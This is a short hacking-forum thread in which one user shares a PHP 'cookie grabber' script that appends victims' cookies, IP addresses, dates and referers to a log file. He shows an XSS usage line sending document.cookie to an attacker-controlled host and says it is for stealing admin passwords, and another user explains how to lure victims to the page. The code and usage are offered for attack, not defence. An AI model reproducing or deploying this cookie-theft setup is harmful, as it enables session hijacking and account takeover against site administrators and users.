AuthorMessage
Methodman
n00b
Posts: 36

I hope that you know what is a "cookie grabber" and how to use him.This script uppat on our ftp allows us to create a file log with cookie of the admin   :wink: 
 
Code:
<?php
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Meka][Meka
Unstopable
Posts: 700

i don't see any point in this script... ? and what does it have todo with cookies??  :?
Methodman
n00b
Posts: 36

  is used in so many exploits php to steal the passwd of admin.
ex: http://attacksite/cookie-grabber.php?cookie='+escape(document.cookie)  but there are so many ways to use it,u can try  some :arrow: cross site scripting (XSS) with cookie g. to see how it rolls  :wink:
 
PS:I think that I had to make this topic in Exploits&Bugs  :roll:
dzadzuks
Ametuar
Posts: 135

basicaly u need to make the person (who cookies you want to steal) to view that page where is that script, then the script saves his cookies etc etc etc